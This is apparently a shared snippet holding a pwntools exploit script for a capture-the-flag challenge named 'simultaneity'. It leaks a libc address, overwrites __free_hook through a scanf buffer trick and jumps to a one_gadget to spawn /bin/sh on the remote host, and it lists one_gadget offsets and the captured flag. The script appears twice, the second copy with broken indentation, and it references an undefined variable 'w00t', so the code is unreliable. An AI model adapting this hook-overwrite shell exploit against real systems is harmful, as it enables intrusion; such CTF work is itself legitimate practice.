ikerl/simultaneity.py Secret

## simultaneity.py
from pwn import *

LOCAL = False
if LOCAL:
    io = process("./simultaneity")
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    """pid = gdb.attach(io, gdbscript='''
    b puts
    b _exit
    ''')"""
else:
    io = remote("mc.ax",31547)
    libc = ELF("libc.so.6")

io.recvline()
io.sendline("274432")
leak = int(io.recvline().decode().split(" ")[-1].replace("0x",""),16)
log.info("Leak: {}".format(hex(leak)))
io.recvline()

offset_libc = 0x44000
log.info("Libc address: {}".format(hex(leak+0x44000-0x10)))
libc.address = leak+0x44000-0x10
__free_hook_addr = libc.symbols["__free_hook"]
__malloc_hook_addr = libc.symbols["__malloc_hook"]
log.info("__free_hook_addr: {}".format(hex(__free_hook_addr)))
log.info("__malloc_hook_addr: {}".format(hex(__malloc_hook_addr)))
log.info("puts: {}".format(hex(libc.symbols["puts"])))

size = int(int(__free_hook_addr - leak)/8)
ptr_overwrite = leak + size*8
log.info("Address to overwrite: {}".format(hex(ptr_overwrite)))

one_gadget = libc.address+0x448a3
log.info("One_gadget address: {}".format(hex(w00t)))

io.sendline(str(size))

io.recvline()


io.sendline(b"0"*50000+str(one_gadget).encode())


io.interactive()

# REMOTE
"""
0x4484f execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x448a3 execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xe5456 execve("/bin/sh", rsp+0x60, environ)
constraints:
  [rsp+0x60] == NULL
"""

# flag{sc4nf_i3_4_h34p_ch4l13ng3_TKRs8b1DRlN1hoLJ}
	from pwn import *

	LOCAL = False
	if LOCAL:
	io = process("./simultaneity")
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
	"""pid = gdb.attach(io, gdbscript='''
	b puts
	b _exit
	''')"""
	else:
	io = remote("mc.ax",31547)
	libc = ELF("libc.so.6")

	io.recvline()
	io.sendline("274432")
	leak = int(io.recvline().decode().split(" ")[-1].replace("0x",""),16)
	log.info("Leak: {}".format(hex(leak)))
	io.recvline()

	offset_libc = 0x44000
	log.info("Libc address: {}".format(hex(leak+0x44000-0x10)))
	libc.address = leak+0x44000-0x10
	__free_hook_addr = libc.symbols["__free_hook"]
	__malloc_hook_addr = libc.symbols["__malloc_hook"]
	log.info("__free_hook_addr: {}".format(hex(__free_hook_addr)))
	log.info("__malloc_hook_addr: {}".format(hex(__malloc_hook_addr)))
	log.info("puts: {}".format(hex(libc.symbols["puts"])))

	size = int(int(__free_hook_addr - leak)/8)
	ptr_overwrite = leak + size*8
	log.info("Address to overwrite: {}".format(hex(ptr_overwrite)))

	one_gadget = libc.address+0x448a3
	log.info("One_gadget address: {}".format(hex(w00t)))

	io.sendline(str(size))

	io.recvline()


	io.sendline(b"0"*50000+str(one_gadget).encode())



	io.interactive()

	# REMOTE
	"""
	0x4484f execve("/bin/sh", rsp+0x30, environ)
	constraints:
	rax == NULL

	0x448a3 execve("/bin/sh", rsp+0x30, environ)
	constraints:
	[rsp+0x30] == NULL

	0xe5456 execve("/bin/sh", rsp+0x60, environ)
	constraints:
	[rsp+0x60] == NULL
	"""

	# flag{sc4nf_i3_4_h34p_ch4l13ng3_TKRs8b1DRlN1hoLJ}